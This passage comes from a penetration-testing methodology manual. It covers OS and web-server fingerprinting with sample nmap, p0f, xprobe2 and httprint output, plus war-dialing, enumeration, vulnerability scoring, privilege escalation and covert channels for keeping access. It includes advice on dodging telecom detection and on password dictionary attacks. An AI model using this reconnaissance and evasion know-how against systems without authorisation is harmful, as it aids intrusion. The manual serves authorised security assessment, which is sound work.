(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN) on 'eth0', 231 sigs (13 generic), rule: 'all'.
192.168.1.101:1298 - Windows XP SP1, 2000 SP3 (2)
-> 192.168.1.102:22 (distance 0, link: ethernet/modem)
192.168.1.102:2298 - Linux 2.5 (sometimes 2.4) (4) (up: 2 hrs)
-> 10.1.1.1:80 (distance 0, link: ethernet/modem)
Using p0f for scanning responses to outgoing connections:
# p0f -A
p0f - passive os fingerprinting utility, version 2.0.5
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN+ACK) on 'eth0', 57 sigs (1 generic), rule: 'all'.
xxx.xxx.xxx.xxx:80 - FreeBSD 5.0 [high throughput] (up: 1411 hrs)
-> 192.168.1.102:2945 (distance 12, link: sometimes DSL (3))
Analysis/Conclusion/Observation
Passive OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, modify information on packet headers such as TTL in critical systems. This
should at least confuse an attacker, forcing her/him to make more noisy scans that should
Page 206 of 1123
show up more easily in intrusion detection systems to alert the target organization.
Links
•
http://www.packetwatch.net/documents/papers/osdetection.pdf
•
http://www.packetwatch.net/documents/papers/osdetection.pdf
•
http://www.usenix.org/publications/library/proceedings/sec2000/full_papers/smart/s
mart_html/index.html
Tools
•
p0f
•
Several protocol analyzers
Remarks
You can perform passive OS guessing while doing some information gathering tests (e.g.
leave p0f on with –A option). Just be aware that some active tests can trigger device filters
that would modify the response (e.g. you might end fingerprinting a firewall instead of a
server behind it).
Page 207 of 1123
B.2.7.2 ACTIVE OS GUESSING
B.2.7.2.1 USING TCP/IP STACK FINGERPRINTING
Description
Use packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Send custom packets (manually or with the aid of tools) to elicit responses that will yield
O.S. specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific O.S. brands and versions.
Examples/Results
Using nmap with –O parameter:
# nmap -O 192.168.1.254
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-04 19:45 CDT
Interesting ports on gateway (192.168.1.254):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:06:25:EC:CC:D9 (The Linksys Group)
Device type: WAP|broadband router
Running: Linksys embedded
OS details: Linksys BEFW11S4 WAP or BEFSR41 router
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
Page 208 of 1123
If possible, modify information on packet headers such as TTL in critical systems. This
should at least confuse an attacker, forcing her/him to make more noisy scans that should
show up more easily in intrusion detection systems to alert the target organization.
Links
•
http://www.insecure.org/nmap/nmap-fingerprinting-article.html
•
http://www.packetwatch.net/documents/papers/osdetection.pdf
•
http://www.usenix.org/publications/library/proceedings/sec2000/full_papers/smart/s
mart_html/index.html
Tools
•
Nmap
•
Queso
•
Several protocol analyzers and packet generators
Remarks
Be aware that some active tests can trigger device filters that would modify the response
(e.g. you might end fingerprinting a firewall instead of a server behind it).
Page 209 of 1123
B.2.7.2.2 USING HTTP PACKET ANALYSIS
Description
Identify brand and version of Web servers through manual analysis of http traffic or
automated tools.
Process
Send custom packets (manually or with the aid of tools) to elicit responses that will yield
Web server specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific Web server brands and versions.
Examples/Results
Using httprint with included signature database:
# ./httprint -h 192.168.1.1 -s signatures.txt
httprint v0.202 (beta) - web server fingerprinting tool
(c) 2003,2004 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
httprint@net-square.com
-------------------------------------------------Finger Printing on http://192.168.1.254:80/
Derived Signature:
811C9DC5E2CE6922811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5
811C9DC5970EE6BB811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5
E2CE6922E2CE6922E2CE6922811C9DC5E2CE6922811C9DC5E2CE6922811C9DC5
E2CE6922E2CE6922811C9DC5E2CE6922E2CE6922E2CE6922E2CE6922E2CE6922
E2CE6922E2CE6922811C9DC5E2CE6922E2CE6922
Banner Reported: Banner Deduced: Linksys BEFSR41/BEFSR11/BEFSRU31
Score: 65
Confidence: 39.16
Page 210 of 1123
-----------------------Scores:
Linksys BEFSR41/BEFSR11/BEFSRU31: 65 39.16
Linksys AP1: 54 21.96
Linksys Router: 52 19.50
Cisco-HTTP: 46 13.26
Cisco Pix 6.2: 46 13.26
…
Analysis/Conclusion/Observation
HTTP protocol fingerprinting will provide information on the Web server brand and version.
This information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart Web Server identification of critical systems.
Countermeasures
If possible, modify Web Server configuration such as HTTP banners in critical systems.
This should at least confuse an attacker, forcing her/him to make more noisy scans that
should show up more easily in intrusion detection systems to alert the target organization.
Links
•
http://net-square.com/httprint/httprint_paper.html
Tools
•
HTTPrint
•
Netcat
•
Several protocol analyzers
Remarks
HTTP fingerprinting is useful even if the web server is behind a web proxy; proxies will filter
and normalize illegal/suspicious requests but will leave answers from the Web servers
unaltered for the most part. Assessors should use this to help identify false positives with
other fingerprinting tests (e.g. an IIS server showing up on a machine previously identified
as a Linux server would indicate that something is wrong; most probably with the O.S.
fingerprinting test).
Page 211 of 1123
B.2.7.2.3 USING ICMP PACKET ANALYSIS
Description
Use ICMP packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Send custom ICMP packets (manually or with the aid of tools) to elicit responses that will
yield O.S. specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific O.S. brands and versions.
Examples/Results
Using xprobe2:
# xprobe2 192.168.0.254
Xprobe2
v.0.2.2
Copyright
(c)
2002-2005
fyodor@o0o.nu,
ofir@sys-security.com,
meder@o0o.nu
[+] Target is 192.168.0.254
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping - ICMP echo discovery module
[x] [2] ping:tcp_ping - TCP-based ping discovery module
[x] [3] ping:udp_ping - UDP-based ping discovery module
[x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan - TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
[+] 11 modules registered
Page 212 of 1123
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.0.254. Module test
failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.168.0.254. Module test
failed
[-] No distance calculation. 192.168.0.254 appears to be dead or no ports known
[+] Host: 192.168.0.254 is up (Guess probability: 25%)
[+] Target: 192.168.0.254 is alive. Round-Trip Time: 0.00259 sec
[+] Selected safe Round-Trip Time value is: 0.00518 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[+] Primary guess:
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.0" (Guess probability: 51%)
[+] Other guesses:
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.19" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.25" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.17" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.23" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.15" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.21" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.21" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.15" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.23" (Guess probability: 51%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, filter ICMP responses from critical systems to the Internet. This should at least
confuse an attacker, forcing her/him to make more noisy scans that should show up more
Page 213 of 1123
easily in intrusion detection systems to alert the target organization.
Be aware that you should at least allow ICMP Type 3, code 4 responses to go through your
filters (i.e. Fragmentation Needed but DF set ICMP packets). This is necessary to for
proper operation of network.
Links
•
http://www.phrack.org/show.php?p=57&a=7
•
http://blackhat.com/presentations/bh-usa-03/bh-us-03-arkin.pdf
•
http://www.linuxsecurity.com/resource_files/firewalls/firewall-seen.html#2
Tools
•
Xprobe
Remarks
Page 214 of 1123
B.2.7.2.4 USING TELNET HANDSHAKE ANALYSIS
Description
Use packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Connect to a telnet server using manual procedures or automated tools and fingerprint the
O.S. brand and version, via de DO and DON’T headers.
Examples/Results
Using telnetfp:
# ./telnetfp 10.0.0.1
telnetfp0.1.2 by palmers / teso
DO: 255 253 24 255 253 32 255 253 35 255 253 39 255 253 36
DONT:
255 250 32 1 255 240 255 250 35 1 255 240 255 250 39 1 255 240 255 250 24 1 255
240
Found matching finger print: FreeBSD
Digital Unix 4.0d/e
NetBSD 1.4.2
Tru64 UNIX V5.0A
Using nmap with –sV option and restricted ports:
# nmap -sV -p21-23 10.0.0.2
Starting nmap 3.55 ( http://www.insecure.org/nmap/ )
Interesting ports on 10.0.0.2:
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 3.4-j2 (protocol 1.99)
23/tcp open telnet Openwall GNU/*/Linux telnetd
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Page 215 of 1123
Companies should do their best to thwart O.S. identification of critical systems
Countermeasures
If possible, modify Telnet Server configuration such as Welcome banners in critical
systems. This should at least confuse an attacker, forcing her/him to make more noisy
scans that should show up more easily in intrusion detection systems to alert the target
organization.
Links
•
http://www.sans.org/resources/idfaq/fingerp_telnet.php
Tools
•
Telnetfp
•
Nmap (-sV option)
•
Several protocol analyzers and netcat
Remarks
Most sites have telnet protocol filtered for the Internet, or have replaced it with more secure
options such as secure shell (SSH).
Page 216 of 1123
B.2.7.2.5 BANNER GRABBING ANALYSIS AND CORRELATION
Description
Use information acquired during Banner Grabbing test to identify inconsistencies and select
specific target services for future tests (e.g. vulnerability scanning).
Process
Fill in a matrix information for each server for correlation, including:
•
Service type
•
Banner
•
Service brand
•
Service version
Identify false positives and mark their (probable) cause.
Search the Internet for relevant information on these services and include the following
information:
•
Known vulnerabilities
•
Configuration issues or parameters that you might want to test further
Analysis/Conclusion/Observation
Banner analysis and correlation with other information gathered from scanning test will
provide attackers and assessors valuable information to focus further tests and decide
where manual tests for vulnerabilities (usually related to configuration issues) should take
place.
Countermeasures
Organizations should ensure that only required information about services/O.S. brands and
versions is available from the Internet.
Links
•
http://www.hackinthebox.org/article.php?sid=7947
Tools
•
Spreadsheets
•
Databases
•
Logic programming languages (e.g. Prolog)
Remarks
If the amount of data, the lack of key information and the number of false positives makes
Page 217 of 1123
the analysis difficult on a spreadsheet, consider using a database or logic programming
languages such as Prolog.
You can build a database that could include information from previous assessments so that
it will be easier to fingerprint a system using by correlating information via queries to this
database.
Page 218 of 1123
B.2.8 Perform War-dialing
Description
In war-dialing a connect request for modem is sent on each number in the target range.
Once modems are identified in target range, a password guess and dictionary attacks are
performed on the user name/password challenge. Sometimes one requires only passwords
to gain unauthorized access.
History shows many attacks were launched using modems. It is due to increase in laptops
hence increase in modems. Following are the recommendations while performing wardialing
•
It is recommended to conduct war dialing once in a year.
•
It is recommended to conduct war dialing after office hrs, it will avoid disturbance
with organizations phone system and employee.
•
Perform test on modem, which are turned off after office hrs.
•
Exclude the important number (e.g. emergency, operation center) from your list to
avoid negative impact because of many calls.
•
Do war-dialing from public phone lines if possible because war-dialing would rise
alarm in almost all telecommunication companies and they would find you as fast as
you think.
It’s common to find Challenge Handshake Authentication Protocol (CHAP) Implementation
in Remote Access Servers. One need to have a tool which supports CHAP while WarDialing. Most of the freeware doesn’t support this.
Process
•
Identify phone number ranges that the target organization uses
•
Find listening modems/RAS servers
•
Identify devices answered
•
Guess password
•
Perform a dictionary attack
Examples/Results
Page 219 of 1123
Analysis/Conclusion/Observation
Modems constitute another way to get into a network. These access paths are usually not
as well defended as the perimeter with the Internet using dedicated connections.
Countermeasures
•
Remove un-authorized modems after verification.
•
If unauthorized modems can't remove, block inbound calls to modem at PBX.
•
For authorized modems, try to configure a call back system to authorized phone
numbers
•
Place firewalls and ids/ips behind remote access servers with modems
Links
•
http://www.atstake.com/research/reports/acrobat/wardialing_brief.pdf
•
http://www.sans.org/rr/whitepapers/testing/268.php
Tools
•
THC-Scan
•
Typhon III `s war-dialer component
•
ISS`s "Telephony Scanner"
Remarks
Appart from being time consuming, war dialing can also make the assessor to incur in high
costs, depending on the location of the testing machines and the target’s location.
Use of RAS systems is becoming less common. However, since they provide an effective
access alternative to the Internet in case of mayor failures, organizations of a certain type
and size will try to maintain some of these systems for emergency situations.
Page 220 of 1123
B.2.9 Host Enumeration
B.2.9.1 SYSTEMS ENUMERATION
Description
Use information acquired during Banner Grabbing Analysis and Correlation test and other
fingerprinting and scanning tests to enumerate services within servers (and to confirm the
O.S. of the scanned system).
Host enumeration allows for information to be organized, so that additional data can be
inferred and false positives can be easily identified.
Process
For each server scanned, fill in the following information (e.g. in a matrix):
•
Server IP
•
Server FQDN
•
List of services discovered (including references to information from Banner
Grabbing Aanalysis and Correlation test)
•
O.S. fingerprint information (from previous tests)
•
Network localization tests (from network mapping tests and traceroutes, if available)
From the above data, you should be able to infer and document the following information
for each server:
•
Purpose for business
•
Impact of the server in the Target’s business
•
Relationships with other servers and network devices (e.g. trust relationships)
Analysis/Conclusion/Observation
Analysis and correlation with other information gathered from scanning test will provide
attackers and assessors valuable information to focus further tests and decide where
manual tests for vulnerabilities (usually related to configuration issues) should take place.
Countermeasures
Organizations should ensure that only required information about services/O.S. brands and
versions is available from the Internet.
Links
•
http://www.hackinthebox.org/article.php?sid=7947
Page 221 of 1123
Tools
•
Spreadsheets
•
Databases
•
Logic programming languages (e.g. Prolog)
Remarks
If the amount of data, the lack of key information and the number of false positives makes
the analysis difficult on a spreadsheet, consider using a database or logic programming
languages such as Prolog.
You can build a database that could include information from previous assessments so that
it will be easier to fingerprint a system using by correlating information via queries to this
database.
Page 222 of 1123
B.2.9.2 WINDOWS SYSTEMS
Description
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
Remarks
Page 223 of 1123
B.2.9.3 NOVELL SYSTEMS
Description
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
Remarks
Page 224 of 1123
B.2.10
Analyze all the information gained
All previously identified and gathered information should be put together into a network
drawing. This is an important step to learn how the network and systems fit together.
Specific target information (e.g. server documentation) should be assessed and
classified in an order of probable impact and vulnerability degree.
Also, all false positives previously found should be analyzed and documented.
B.2.11
Global Countermeasure
General countermeasures for previous findings should take place at this phase. This
documentation will include general recommendations, such as:
• Allow only necessary services.
•
Change existing default banner(s)
•
Limit Unnecessary Services at Border Firewall/Router
o
Block/Droop ICMP request(s)
o
Block/Droop unnecessary TCP SYN packets(s)
o
Block/Droop unnecessary UDP packets(s)
Page 225 of 1123
B.3 VULNERABILITY ASSESSMENT (IDENTIFICATION)
Description
This section provides information about vulnerability identification by evaluating them
and types of tools used. It provides familiarity to the IT staff involved in vulnerability
assessment team and also provides guidelines to assessment team.
Vulnerability Identification moves one stage deeper taking the enumerated data, network
topology and gathered information to find flaws within the network, servers, services and
other attached information resources. From the network mapping and enumeration you
are looking at factors such as how accurately you can identify services and operating
systems. With this information (open ports etc) you will be able to build a catalogue of
vulnerable servers/hosts. During this section such tools as vulnerability scanners, cgi
scanners and various other tools can be used (Nessus/ ISS/ Whisker/ Nikto) to highlight
vulnerabilities and match them to known exploits.
Previous information should allow the assessor to fine tune vulnerability scanning tools
so as to avoid false positives and focus on relevant issues, instead of blindly scanning a
range of network servers with all test patterns available. Broad vulnerability scanning
without fine tuning is considered a bad practice, since it increases considerably the
number of false positives and false negatives, and reduces the quality of the
assessment.
Aim/Objective
The aim of this stage is to use the information gathered earlier to make a technical
assessment of the actual existence of vulnerabilities. This is done by matching
vulnerable service versions to known and theoretical exploits, traversing the network in
unintended directions, testing web services for vulnerabilities such as XSS and SQL
injection, locating weak passwords and account, escalation of privileges and so on as
detailed in the main body of the document. During the vulnerability identification stage
you intend to identify as many positive intrusion/penetration avenues into the target
network as possible. If required these can be demonstrated in the next section, proof of
concept.
Process
Page 226 of 1123
•
Step 1: Identifying vulnerable services for known vulnerabilities, using service
banners , O.S./service fingerprints, open ports and all relevant information
from previous stages.
Banner information can be gathered by running an automated banner grabber,
customized tool or information gathered from previous steps.
•
Step 2: Perform vulnerability scan by automated scanners for known
vulnerabilities
o
Perform all the protocol TCP (including both SYN and CONNECT scan
methods), UDP and ICMP scan
o
Feed the entire results (1-65535, TCP+UDP) of the port scanning tool
gathered in port scanning step into the vulnerability assessment tool.
o
Un-check denial of service plug-ins. Check manually if there is any denial of
service plug-in selected in any category.
•
Step 3: Identify un-disclosed vulnerabilities [Optional]
o
Identify un-disclosed vulnerabilities which are in underground
o
Audit source code and/or program binary to identify vulnerabilities which are
not available in public vulnerability databases.
•
Step 4: Make a list of all vulnerabilities found
Here make a list of all the vulnerabilities found by both scanners. Some well known
false positives from specific scanners can be avoided from this list.
•
Step 5: Perform false positive and false negative verification
Refer to corresponding appendix for more details.
•
Step 6: Make a final list of vulnerabilities and recommend immediate measures
In this stage review all vulnerabilities discovered by assessment tool[s]. Interprets the
results and make a final list of vulnerabilities based on severity of vulnerability and
criticality of asset. Discuss identified vulnerabilities with IT staff as per need since
they are better about the need of services implemented in systems. Identify which
Page 227 of 1123
vulnerabilities require immediate measures and inform management immediately
with countermeasure to safeguard them.
Prepare a vulnerability summary as per domain/components based on severity of
risk, based on business process impact. Note that this classification might differ
significantly from technical risk classification.
Technical risk classification of vulnerabilities is usually done automatically by
vulnerability scanning tools relatively accurately (provided that there are low false
positives/negatives rates), however, an analysis based on business impact is more
useful for the Target organization, it will give added value to the project and it will
make it easier to schedule projects to apply fixes, as well as justifying their budget.
In other words, simply running the tools and handing over the reports generated by
them (with only technical assessments) is a poor practice and gives little value to the
assessed organization (i.e. the target organization will question if it is not cheaper to
buy/download and run the tools themselves, and get the same benefits) .
Since business impact requires deep knowledge of the target organization and its
processes, the assessor should first deliver a first draft based on previous
experience. Yet, this document needs to be reviewed along with personnel of the
assessed
organization
to
properly
identify
the
business
impact
and
the
corresponding adjustments should be done.
Along with this report, the assessor will deliver a technical report that will contain
mostly the findings reported by the tools, but extending the documentations and
explaining technical impact for the particular case of the target organization, where
appropriate.
The classification of vulnerability risk based on business impact should follow the
following guidelines:
Severity
Description
High risk vulnerabilities
Classification criteria:
Page 228 of 1123
Vulnerabilities should be classified as high
risk if there is an immediate threat of high
and adverse impact on the business crtical
processes of the target organization.
I.e.
vulnerabilities that allow compromise for
systems
that
support
critical
business
processes, vulnerabilities that allow mass
propagating
malware
to
affect
these
systems, or signs that these systems have
been compromised.
When the availability of certain business
process is critical (e.g. systems that verify
and control mechanical operations, where a
failure could result in serious injuries for
personel or have a high cost to the target
organization, should be classified as high
risk.
Reporting and solving criteria:
Organizations
should
take
immediate
measures, and try to fix problems ASAP;
fixing procedures should not last more than
a week.
Assessors
should
report
this
kind
of
vulnerabilities immediately, and temporarily
suspend tests, if it is convenient and agreed
with personnel from the target organization.
Medium Risk vulnerabilities
Classification criteria:
Vulnerabilities
should
be
classified
as
medium risk, if there is threat of high and
adverse impact to non-critical systems in
terms of business. Also, if there is no
Page 229 of 1123
immediate threat nor a big impact and the
vulnerability
affects
critical
business
systems (e.g. Denial of service vulnerability
for systems that can withstand a reasonable
amount of time out of operation, without
affecting business), the vulnerability should
be classified as medium.
Reporting and solving criteria:
Try to fix soon; about two weeks is
reasonable time. Report should be done
after the assessment. However, If there are
doubts regarding the impact to business, the
assessor should give a preview of the
findings to the target personnel so that more
information on the impact can be gathered
and
the
vulnerability
risk
is
properly
assessed.
Low Risk vulnerabilities
Classification criteria:
Vulnerability should be classified as a low
risk whenever the technical and business
impact is low. E.g. vulnerabilities that allow
non-restricted information disclosure.
Reporting and solving criteria:
Organisations should take a comfortable
time, and try to fix with-in month. A series of
low level risk vulnerabilities may cause
similar damage as medium-risk and even
high risk vulnerabilities, so this should be
taken into account. Generally that will need
a strong threat matrix.
Report
should
be
done
after
assessment.
Page 230 of 1123
the
Business Impact vs Technical Impact matrix
Another useful aid to create the report of vulnerability risk that takes into account
business impact is the following matrix:
High technical
risk
Low risk for
Medium risk for
High risk for
Business
Business
Business
Resulting Risk: MED
Resulting Risk: HIGH
Resulting risk: HIGH
(e.g. total
(e.g. total
(e.g. total
compromise
compromise
compromise
capability on system
capability on system
capability on critical
that is unimportant for that is important to
business)
business system)
support business
processes)
Medium
Resulting Risk: LOW
Resulting Risk: MED
Resulting risk: HIGH
technical risk
(e.g. DoS capability
(e.g. DoS capability
(e.g. DoS capability
on system that is
on system that is
on critical business
unimportant for
important to support
system)
business)
business processes)
Resulting Risk: LOW
Resulting Risk: LOW
Resulting Risk: MED
(e.g. Non-critical
(e.g. Non-critical
(e.g. Non-critical
information leak on
information leak on
information leak on
system that is
system that is
system that is critical
unimportant for
important to support
for business)
business)
business processes)
Low technical
risk
The matrix above should only be taken as a guide, but the assessor should be aware
that business impact might overweight technical impact.
Test Results
This section provides test results based on a common network architecture design.
Page 231 of 1123
Assessors should create diagrams to show vulnerability exploitation paths and stages.
This will make it easier for the Target organization personnel to understand the
vulnerabilities, and to identify points of control where they should make changes in order
to minimize risk.
Vulnerability Scanners
Vulnerability scanners are tools designed to perform automated tests to identify and
verify (with some degree of accuracy) the existence of vulnerabilities. Assessors should
make use these tools to perform most of the vulnerability scanning activities, and save
manual penetration procedures for complementing scanning of complex or well
protected systems, where they will be more rewarding and/or where vulnerability
scanners capability is limited.
Some Vulnerability Scanners:
•
•
Nessus (free to use/ commercial)
o
http://www.nessus.org
o
http://www.networkintrusion.co.uk/N_scan.htm
Sara (free to use)
o
•
http://www.www-arc.com/sara/
Internet Scanner (commercial, by ISS)
o
http://www.iss.net/products_services/enterprise_protection/vulnerability_a
ssessment/scanner_internet.php
•
Retina Network Security Scanner (commercial, by Eeye)
o
•
http://www.eeye.com/html/products/retina/index.html
Netrecon (commercial, by Symantec)
o
http://enterprisesecurity.symantec.com/products/products.cfm?ProductID
=46
Search vulnerabilities for the detected OS using the following Web Sites
•
Concern Vendor/Product Sites are most trusted
•
BugTraq ID
•
CERT
•
www.packetstormsecurity.com
Page 232 of 1123
B.4 PENETRATION
If the client requires proof of any vulnerabilities or exploits you have identified in the
previous section one need to demonstrate them in a controlled environment (i.e. you
may need to change routing tables).
The assessor tries to gain access by circumventing security measures in place and
expand access as much as possible. This process can be divided in the following steps:
•
Find proof of concept code/tool
•
Test proof of concept code/tool
•
Write your own proof of concept code/tool
•
Use proof of concept code/tool
B.4.1 Find proof of concept code/tool
Find proof of concept code available in your own repository or from publicly available
sources to test for vulnerabilities. If the code is from your own trusted repository and
thoroughly tested, you can use it, otherwise test it in an isolated environment.
B.4.2 Test proof of concept code/tool
o
Customize proof of concept code/tool
o
Test proof of concept code/tool in an isolated environment
B.4.3 Write your Own Proof of Concept code/tool
Skip this step if you already have proof of concept code/tool with you. Many
vulnerabilities you will come across on which you will not find publicly available proof of
concept code. For these vulnerabilities assessment team should write own proof of
concept code.
B.4.4 Use Proof of Concept code/tool against Target
The proof of concept code/tool is used against the target to gain as many points of
unauthorized access as possible.
Page 233 of 1123
B.5 GAINING ACCESS AND PRIVILEGE ESCALATION
In any given situation a system can be enumerated further.
B.5.1 Gaining Access
This stage comes when assessor has gained some access on target by steps mentioned
in previous stage and by this privilege he is in position to escalate his privileges. This
privilege may be a compromise, final compromise, least privilege or intermediate
privileges. This stage can be further classified as follows:
•
Gain Least Privilege
•
Gain Intermediate Privilege
•
Compromise
•
Final Compromise
Above mentioned steps need not be in sequence or in structured manner. It’s also not
necessary that if you follow these steps in sequence you will be stealthier. Any one step
can come first.
If the auditor has acquired an intermediate target and is able to use it for pivoting, the
Penetration Testing process will go back to Stage 1, cycling through stages 1 to 5 until
the final target is compromised or the allotted time runs out.
B.5.2 Gaining Access - Gain Least Privilege
Some privileges on the target are gained and these privileges can be used to get further
access to the system. This can be a user account with normal user privileges anywhere
in the network.
B.5.3 Gaining Access - Gain Intermediate Privilege
More privileges than the previous step are gained and these privileges can be used to
get further access to the system. It can be a privileged user account anywhere in the
network (e.g. domain administrator account, service accounts, backup user accounts
…).
Page 234 of 1123
B.5.4 Gaining Access – Compromise
A system is fully compromised anywhere in the target network and further attack from
this system can be performed. This system can be used as a step stone for other attacks
to the final goal.
B.5.5 Gaining Access - Final Compromise on Target
In this step, the “real” victim like the company master DB or a specific system/file is
compromised.
It’s indicative of penetration testing engagement. Game Over!
B.5.6 Privilege Escalation
If an assessor has gained some privileges in above mentioned steps and is in position to
attack further, follow step 2.1 to 2.5 again.
B.6 ENUMERATE FURTHER
•
Perform Password attacks
•
Sniff traffic and analyze it
•
Gather cookies
•
E-mail address gathering
•
Identifying routes and networks
•
Mapping internal networks
B.7 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose entire network. Doesn’t matter how much secure
your perimeter network is.
Security between remote users/sites and enterprise network only secures them. What if
the remote users/sites are compromised?
Assessor should try to compromise remote users, telecommuter and/or remote sites of
an enterprise. It will give privileged access to internal network.
Page 235 of 1123
If you are successful to gain access into remote sites, follow step 1.1 to 1.7, else move
to next step.
Countermeasure
•
Implement proper security at remote sites.
•
Use desktop firewall on remote users’ desktops, telecommuter laptops. Preferably a
central managed desktop firewall solution which can not be disabled by the users.
•
Implement host based intrusion detection and prevention mechanism on remote
users’ desktops, telecommuter laptops.
•
Have a separate access control policy for remote users/telecommuter and/or remote
sites.
Examples:
•
Cyberarmor
•
Checkpoint SecureClient
•
Symantec Client Security / Symantec VPN Client
Page 236 of 1123
B.8 MAINTAINING ACCESS
B.8.1 Covert Channels
~Whispers on the Wire~
Covert Channels
Introduction
After getting the initial asses to the compromise network, assessor needs to retain the
communication links with the target network. For this covert channel can become the
most effective and stealthy technique with least chances of detection.
This section of the methodology covers the intriguing theme of network based covert
channels and describes how these copse data communication and hiding techniques
can be, and are being actively exploited over various communication networks. It gives
the reader a detail insight on the background, methods, tools, detection techniques and
future implications associated with them. We will have the latest insight in to this rapidly
evolving field.
History
Covert channels is a genre of information security research which generally does not
form a part of mainstream discussions but it has been an active discussion topic in
research and government domain for the past 30 years. The notion of covert channels
spawned from a paper by B. W. Lampson titled "A Note on the Confinement Problem"
during the communications of the ACM in October 1973 which introduced the term but
restricted its use to a subclass of leakage channels that excluded storage channels and
legitimate channels. Lampson defines covert channels as a method of information
transmission over channels not destined for communication, like the process state
buffers. However, the most widely accepted definition of covert channels, by Department
of Defense Trusted Computer System Evaluation Criteria, defines it as
“... any communication channel that can be exploited by a process to transfer information
in a manner that violates the system's security policy.”
Page 237 of 1123
This document categorizes the covert channels into two types: Covert Storage Channels
and Covert Timing Channels.
Covert storage channel can be described as the writing of hidden data into a storage
location not specifically meant for communication, by the communicating entities. In
contrast, communication in a covert timing channel happens when the communicating
entities signal information by manipulating its system resources which affects the
response time observed.
Covert channels and steganography (the Greek for covered writing) are inter-weaved
and are often confused. Both deal with data-hiding techniques and piggybacking of
message on legitimate communication channels. An example of steganography is
manipulating the low order bits of a bitmap file to conceal information. The science of
steganography thus avails covert channels in order to have secret information transfer.
Methodology
This
section
covers
structured
process
to
establish
a
backdoored
covered
communication channel which includes:
1. Identify Covert Channel which can be used
2. Select the best available tool for the covert channel
3. Setup the cover channel in the target network
4. Test the covertness of channel using common detection technique
B.8.2 Identify Covert Channel which can be used
The most important consideration at this stage is to choose the correct communication
channel, which will lead to minimal detection, better performance and has multitude of
tools to choose from.
From the initial assessment of target network we have to analyze which protocol are
being allowed to bypass access controls and how much leniency has been provided in
the access control of each protocol. With this information assessor can decide the
communication protocol to exploit for covered communication.
B.8.3 Select the best available tool for the covert channel
Page 238 of 1123
All well known covert communication techniques have a multitude of tools to choose
from. The assessor must decide the right tool on the basis of the purpose for which it will
be used and any other performance requirement. For example for large data transfer
e.g. files, HTTP based covert channels are the best counterpart. For performance based
issues we can use ICMP based covert channels. For security issues we can use SSLtunneling.
B.8.4 Methodology - Setup the covert channel in the target network
After choosing the right communication channels and tools for covert communication,
assessor needs to setup and implement the covert channel for the required purposes.
Henceforth this section describes required meticulous techniques which can be widely
used over network protocols and can be actively exploited for the desired purpose.
Internet Protocol (IP)
Internet Protocol (or IP) is the network layer protocol which drives the Internet. It is a
robust connection-less protocol providing the best way in which higher layer protocols
can send packets to the remote destination in the most economical manner.
The figure shown below describes the structure of the IP header. Many fields in the IP
header are optional, reserved or not being used in active connections. These fields can
be used for hiding concealed data bytes which can be used as a method covert data
transfer between the sender and receiver.
Page 239 of 1123
The IP ID Method
